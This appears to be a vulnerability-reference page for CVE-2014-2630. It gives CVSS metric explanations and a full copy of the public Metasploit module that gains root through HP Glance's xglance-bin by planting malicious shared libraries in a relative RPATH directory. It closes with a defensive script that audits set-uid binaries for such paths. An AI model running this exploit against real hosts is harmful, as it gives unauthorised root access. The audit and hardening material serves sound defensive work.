Attack Vector (AV): Network
The vulnerable system is bound to the network stack, and the set of possible attackers extends beyond the other Attack Vector values (Adjacent, Local, Physical), up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).

Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.

Privileges Required (PR): Low
The attacker requires privileges that provide basic capabilities, typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.

User Interaction (UI): None
The vulnerable system can be exploited without interaction from any human user other than the attacker. Examples include: a remote attacker is able to send packets to a target system; a locally authenticated attacker executes code to elevate privileges.

Scope (S): Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.

Confidentiality (C): High
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or the attacker may gain control over confidential data.

Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.

Availability (A): High
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy of the public Metasploit module: HP Performance Monitoring xglance Privilege Escalation
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Performance Monitoring xglance Priv Esc',
        'Description' => %q{
          This exploit takes advantage of xglance-bin, part of
          HP's Glance (or Performance Monitoring) version 11 'and subsequent',
          which was compiled with an insecure RPATH option. The RPATH includes
          a relative path to -L/lib64/ which can be controlled by a user.
          Creating libraries in this location will result in an
          escalation of privileges to root.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'h00die', # msf module
            'Tim Brown', # original finding
            'Robert Jaroszuk', # exploit
            'Marco Ortisi', # exploit
          ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' =>
          [
            [ 'Automatic', {} ],
            [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
            [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
          ],
        'Privileged' => true,
        'References' =>
          [
            [ 'EDB', '48000' ],
            [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
            [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
            [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],
            [ 'PACKETSTORM', '156206' ],
            [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
            [ 'CVE', '2014-2630' ]
          ],
        'DisclosureDate' => 'Nov 19 2014',
        'DefaultTarget' => 0
      )
    )
    register_options [
      OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Simplify pulling the writable directory variable
  def base_dir
    datastore['WritableDir'].to_s
  end

  # The relative RPATH entry "-L/lib64/" is resolved against the directory
  # xglance-bin is started from, so the malicious libraries go under
  # <WritableDir>/-L/lib64/ and the binary is launched from <WritableDir>.
  def exploit_folder
    "#{base_dir}/-L/lib64/"
  end

  def glance_path
    datastore['GLANCE_PATH'].to_s
  end

  # Pull the exploit binary or file (.c typically) from our system
  def exploit_data(file)
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
  end

  # Name of the libX* dependency that ldd reports as resolved through the
  # relative -L/lib64 RPATH entry, or nil if none is.
  def find_libs
    libs = cmd_exec "ldd #{glance_path} | grep libX"
    %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs
    return nil if lib.nil?

    lib
  end

  def check
    unless setuid? glance_path
      vprint_error "#{glance_path} not found on system or not setuid"
      return CheckCode::Safe
    end

    lib = find_libs
    if lib.nil?
      vprint_error 'Patched xglance-bin, not linked to -L/lib64/'
      return CheckCode::Safe
    end

    vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"
    CheckCode::Appears
  end

  def exploit
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # delete exploit folder in case a previous attempt failed
    vprint_status("Deleting exploit folder: #{base_dir}/-L")
    rm_cmd = "rm -rf \"#{base_dir}/-L\""
    cmd_exec(rm_cmd)

    # make folder
    vprint_status("Creating exploit folder: #{exploit_folder}")
    cmd_exec "mkdir -p #{exploit_folder}"
    register_dir_for_cleanup "#{base_dir}/-L"

    # drop our .so on the system that calls our payload
    # we need gcc to compile instead of metasm since metasm
    # removes unused variables, which we need to keep xglance-bin
    # from breaking and not launching our exploit
    so_file = "#{exploit_folder}libXm.so.3"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
      code = exploit_data('CVE-2014-2630.c')
      code.sub!('#{payload_path}', payload_path) # inject our payload path
      upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'
      rm_f "#{so_file}.c"
    else
      payload_path = '/tmp/.u4aLoiq'
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx so_file, exploit_data('libXm.so.3')
    end

    # Upload payload executable
    vprint_status 'uploading payload'
    upload_and_chmodx payload_path, generate_payload_exe

    # link so files to exploit vuln
    lib = find_libs
    # just to be safe, Xt and Xp were in the original exploit
    # our mock binary is also exploitable through libXmu.so.6
    # unsure about the real binary
    cd exploit_folder
    ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|
      cmd_exec "ln -s libXm.so.3 #{l}"
    end

    # Launch exploit
    print_status 'Launching xglance-bin...'
    cd base_dir
    output = cmd_exec glance_path
    output.each_line { |line| vprint_status line.chomp }
    print_warning("Manual cleanup of #{exploit_folder} may be required")
  end
end
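The module's check is deliberately narrow: it runs ldd and looks for one libX* dependency resolved through the literal -L/lib64 entry. The defect class behind it is broader. ld.so drops LD_LIBRARY_PATH when it starts a set-uid or set-gid program, but it still honours the DT_RPATH / DT_RUNPATH search list embedded in the binary, and any entry in that list that is empty or does not begin with "/" is resolved against whatever directory the caller starts the program from. The audit script below is an added example written for this page; it is not part of the Metasploit module or of HP's software. It assumes GNU binutils readelf is installed (its "-d" output is what gets parsed) and uses a constructed readelf excerpt, modelled on the page's description of xglance-bin, for an offline self-test.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the page or of the Metasploit module above.
# Audits ELF binaries for DT_RPATH / DT_RUNPATH entries that the dynamic
# loader resolves against the caller's current working directory, which is
# the defect class behind CVE-2014-2630 (xglance-bin linked with "-L/lib64/").
#
# Assumptions (mine, not the page's): GNU binutils `readelf` is installed and
# its -d output carries "Library rpath: [...]" / "Library runpath: [...]"
# lines; SAMPLE_READELF below is constructed for the offline self-test.

require 'open3'

Finding = Struct.new(:tag, :entry, :reason)

# DT_RPATH / DT_RUNPATH hold a colon-separated search list. An entry that is
# empty (from an empty string or a leading, trailing or doubled colon) or that
# does not start with "/" is searched relative to cwd, so an unprivileged user
# who picks the cwd of a set-uid program also picks which libraries it loads.
# $ORIGIN expands to the directory holding the binary, not to cwd, so it is
# left alone here.
def classify_rpath(tag, value)
  entries = value.empty? ? [''] : value.split(':', -1)
  entries.map do |entry|
    if entry.empty?
      Finding.new(tag, entry, 'empty search-path entry is resolved against cwd')
    elsif entry.start_with?('$ORIGIN', '${ORIGIN}')
      nil
    elsif !entry.start_with?('/')
      Finding.new(tag, entry, 'relative search-path entry is resolved against cwd')
    end
  end.compact
end

# Pull the rpath/runpath lines out of `readelf -d` output and classify them.
def parse_readelf_dynamic(text)
  text.each_line.flat_map do |line|
    m = line.match(/\((RPATH|RUNPATH)\)\s+Library r(?:un)?path:\s*\[(.*)\]/)
    m ? classify_rpath(m[1], m[2]) : []
  end
end

def audit_binary(path)
  out, status = Open3.capture2e('readelf', '-d', path)
  status.success? ? parse_readelf_dynamic(out) : []
rescue Errno::ENOENT
  warn 'readelf not found; install binutils'
  []
end

def setuid_or_setgid?(path)
  st = File.stat(path)
  st.setuid? || st.setgid?
rescue SystemCallError
  false
end

# Returns [[path, [Finding, ...]], ...] for every set-uid/set-gid regular file
# directly under the given directories that carries a risky search-path entry.
def audit_directories(dirs)
  dirs.flat_map { |d| Dir.glob(File.join(d, '*')) }
      .select { |p| File.file?(p) && setuid_or_setgid?(p) }
      .map { |p| [p, audit_binary(p)] }
      .reject { |_, findings| findings.empty? }
end

# Constructed readelf -d excerpt: the RPATH line follows the page's description
# of xglance-bin; the RUNPATH line is made up to exercise the empty-entry case.
SAMPLE_READELF = <<~'OUT'
  Dynamic section at offset 0x1d8 contains 4 entries:
    Tag        Type                         Name/Value
   0x0000000000000001 (NEEDED)             Shared library: [libXm.so.3]
   0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
   0x000000000000000f (RPATH)              Library rpath: [-L/lib64/:/opt/perf/lib64]
   0x000000000000001d (RUNPATH)            Library runpath: [$ORIGIN/../lib::/usr/lib]
OUT

if $PROGRAM_NAME == __FILE__
  parse_readelf_dynamic(SAMPLE_READELF).each do |f|
    puts "sample: #{f.tag} entry #{f.entry.inspect}: #{f.reason}"
  end
  # Live scan; defaults to the directory of the module's GLANCE_PATH.
  audit_directories(ARGV.empty? ? ['/opt/perf/bin'] : ARGV).each do |path, findings|
    findings.each { |f| puts "#{path}: #{f.tag} entry #{f.entry.inspect}: #{f.reason}" }
  end
end
```

Run it as `ruby rpath_audit.rb /opt/perf/bin /usr/bin /usr/sbin` on a host; on the constructed sample it reports the relative "-L/lib64/" RPATH entry and the empty RUNPATH entry and stays quiet about "$ORIGIN/../lib" and the absolute paths. Where a finding cannot be fixed by upgrading the package, the search list can be rewritten with `patchelf --set-rpath /opt/perf/lib64 <binary>` (or removed with `chrpath -d`); check afterwards with `ldd` from an unrelated directory that every dependency still resolves, since a program that relied on the relative entry to find its own libraries will otherwise fail to start.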